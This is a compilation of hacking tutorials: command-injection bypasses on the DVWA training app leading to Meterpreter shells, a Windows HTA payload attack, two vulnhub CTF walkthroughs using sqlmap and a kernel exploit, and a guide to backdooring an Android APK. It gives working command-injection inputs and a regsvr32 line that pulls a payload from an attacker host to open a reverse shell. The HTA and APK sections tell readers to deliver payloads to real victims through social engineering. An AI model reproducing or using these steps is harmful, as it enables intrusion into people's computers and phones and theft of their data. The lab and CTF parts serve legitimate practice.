Command Injection Exploitation in DVWA using Metasploit (Bypass All Security)

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

First install the DVWA in your PC full article read here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Use "&&" in command injection to bypass low security of this server.

Go to the command execution page Enter an IP address and click on submit.

Now you can see the reply which means we have establish a connection with the server. Try as many variations as possible to provide a command to execute. You will see this every time!

We can also execute multiple commands at one time just by using the & sign. For example Next command is 192.168.1.100 && dir click on submit, this command will enumerate the directory and file.

We have found 4 directories and a file and also that path this directory.

Next command is 192.168.1.100 && net user click on submit, this will show user account.

Here you can see the list of all users

So as many as command you will submit, you will have desirable result. Now I want to access shell by using command injection with the help of metasploit.

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106

msf exploit(regsvr32_applocker_bypass_server) > set lport  4444

msf exploit(regsvr32_applocker_bypass_server) > exploit

We can also use the following command in order to open a port on the remote host and to connect back to it with metasploit.

192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on submit

Now you will get meterpreter session of victim’s PC. And type sysinfo to get system information.

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

Use pipe "|" in command injection to bypass medium security of this server.

Follow same process as above using metasploit

192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll and click on submit

Again we got meterpreter session 2

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

Try to use pipe "||" in command injection to bypass high security of this server

Follow same process as above using metasploit

192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll  and click on submit

Yes, we have meterpreter session 3 also

Hack Remote Windows 10 PC using HTA Web Server

This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed

Exploit Targets

Windows All Versions

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Send the link of the server to the victim via chat or email or any social engineering technique. 

When Victim Machine browsing to your link it will download anything.hta file when victim click on it you will get the meterpreter session

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack the SpyderSec VM (CTF Challenge)

Hello friends!! Today we are going to solve another CTF challenge “SpyderSec” presented by vulnhub.com to practice OSCP lab challenges.

Challenge: You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.

You can download it from here: https://www.vulnhub.com/entry/spydersec-challenge,128/

Level: Intermediate

Penetrating Methodologies:

§  Network Scaning (Netdiscover, Nmap)

§  Extracting Metadata (Exiftool)

§  Decoding Hex to Ascii

§  Exploit eval function using javascript unpackage.

§  Capture HTTP requset (Burpsuit)

§  Decode the URI to get themuder.fbi file

§  Unlock the hidden drive (veracrypt)

§  Capture the Flag.

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

Our target is 192.168.1.101. Scan the target with nmap.

nmap -A 192.168.1.101

There are only two ports open i.e. 22 and 80 for SSH and HTTPS respectively. Next, I opened this page in browser.

There was nothing major on the page except for two images. There is a possibility about metadata behind these images. Therefore, I read these images with exif tool. One of the images which were saved by the name of “challenge” had a comment behind it. To read it type:

exiftool Challenge.png

If you observe closely the comment is in hexadecimal form. We need to convert it into readable form. No third party tool is required just go online to hex to Ascii converter copy the string and paste it in the text box and then click the convert button.

After converting we again have hexadecimal string. No problem. Let’s convert it again as we did earlier.

This time we got base 64 encode and to decode it we use following command.

echo ‘bas64 text’ |base64 -d

Now finally we have a readable string. This can be a password or a directory. Note it down for future use.

Moving on if you go through the source code of the home web page you will find that evil function is quite unusual.

I searched about eval function on google and found that it is a java script. There can be code hidden behind it. So let’s unpack it with the javascript unpacker.

After unpacking you will again come face to face with a hexadecimal string. Convert this string just like before.

After conversion the string became “alert(‘mulder.fbi);” .

I explored a lot and search a lot but found nothing about it so decided to capture its cookies through BurpSuite.

In cookies I found an encoded URI that means it’s a part of a link. From here copy the link and open it in the browser.

Now when I opened it there was an error.  Then I explored a d bit and remembered that there was a mulder.fbi so I added that to the link.

After adding mulder.fbi to the link it asked me to download a file. Save it.

When you open the file that you just saved then it will play a video with different quotes. Now I was clueless about this so I started searching about it on Google. And I found out that it was a truecrypt file. So to see what is hidden type:

python tcsteg.py mulder.fbi

There was a whole drive hidden behind it. And using veracrypt you can see and open the drive.

When you open it will ask for a password and we have found the password beforehand. So give the password there.

Hence the drive will be unlocked. Now open the drive. And you will find flag there.

Hack the VulOS 2.0 VM (CTF Challenge)

“Your assignment is to pentest a company website, get root of the system and read the final flag” is the only thing we know about this VM other than that is it a smaller one. Therefore without any further ado lets starts by finding our target aka victim.

Breaching Methodologies:

·         Network Scanning (netdiscover, Nmap)

·         Enumeration (source code review)

·         Use Exploit 32075 (searchsploit)

·         SQL injection (sqlmap)

·         Use fetched credential for SSH login

·         Kernel Privilege Escalation (Exploit 37292)

·         Get Root access and capture the flag.

Here it has discovered the target IP: 192.168.1.102, and now we will run nmap to determine what services are running.

nmap -p- -A 192.168.1.102          

So, the services that running is SSH on 22 ports, HTTP on 80 ports, IRC on 6667. As port 80 is open that means we can open it in browser.

Since we didn’t found anything on web page therefore we looked into its source code and here saw a link /jabc; let’s open it.

When we had explored /jabc in the browser, it put up following page.

In this webpage there were various tabs and I explored each tab including their page source and I found nothing except for the last tab i.e. Document. 

When you look into the page source there will be line saying “/jabd0cs/ on the server. Just log in with guest/guest.”

So, I opened the directory and logged in with guest: guest as username: password respectively. And there was an upload option but there was a restriction that you can only upload .doc file so it was pretty useless.

If you observe the log in page there is a cms opendocman v1.2.7. this version of opendocman is vulnerable.

Let’s search for its exploits to be used against opendocman. And for that type:

searchsploit OpenDocMan 1.2.7

From its result we found exploit 32075.txt which was showing “the vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.”

Now we will use sqlmap to find out database of usernames and passwords and for that type:

sqlmap -u ‘http://192.168.1.102/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user’ --risk=3 --level=5 --dbs --threads=4 --batch

And we have fetched database name “jabcd0cs”

sqlmap -u ‘http://192.168.1.102/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user’  -D jabcd0cs --risk=3 --level=5 --threads=4 --dump-all --batch

The sqlmap command will show us all the username and passwords as shown below.

As you can see that the password is in MD5 hash value. We can crack it online no third party tool is needed.

Password turns outs to be webmin1980 with the username of webmin. As we have username and password we can log in through SSH port. And to log in through SSH open a new terminal in kali and type:

ssh webmin@192.168.1.102

And then give the password when asked and you will have a session. Let’s check the version of kernel to see if it vulnerable or not.

lsb_release -a

The version is 14.04 that means it can be exploited, and for that type:

searchsploit ubuntu 14.04

It has shown so many exploits and from those we chose 37292.c for overlayfs' Local Privilege Escalation’.

Start python HTTP server for transferring it into victim’s machine

Type the following command to download it:

cd /tmp

wget https://192.168.1.108/37292.c

As the exploit is downloaded, now as always we need compile it and then run it. And for that the set of commands is:

 gcc 37292.c -o shell

./shell

And voila you have reached root but our challenge is not completed here. We still have to find the flag. Once you have reached root then go into the /root directory:

id

cd /root

Lets check what files and folders it is holding.

ls

And here you will a flag.txt. Read it!

cat flag.txt

Hack any Android Phone using Spade APK Backdoor

In this article we will learn yet another method hack android authentically. This is the most uncontrived way of hacking an android user as you are binding your maligant file with the original one just like we did with apk.

Firstly, we will download ccleaner from www.apk4fun.com as we will bind our payload file with it.

Our next step will be downloading the software is Spade. To download it go to the terminal in your Kali and type:

 git clone https://github.com/suraj-root/spade.git

The enactment of the above command with installs the software successfully. Next, type:

./spade.py /root/Desktop/ccleaner.apk

When you run the above command it will ask you the information about payload, lhost, lport. For payload select option 3 that means type 3. And the give lhost and lport :

Lhost > 192.168.0.104

Lport>4444

Previous rendition of the commands helps us bind an original file with our personalized malign file.

After it has all been done successfully, it will ask us to set the listener. Type’y’ here now a new apk will save in spade folder

Now, you can go ahead and send the victim the link so that he can download it.

As the victim will click on install, the application will start downloading along with our malicious file.

And when the application will be opened you will have victim session.

As you remember you typed ‘y’ before to create listener and the listener is created automatically on the all the details you had given previously. And then to simple have the session type:

sessions –i 1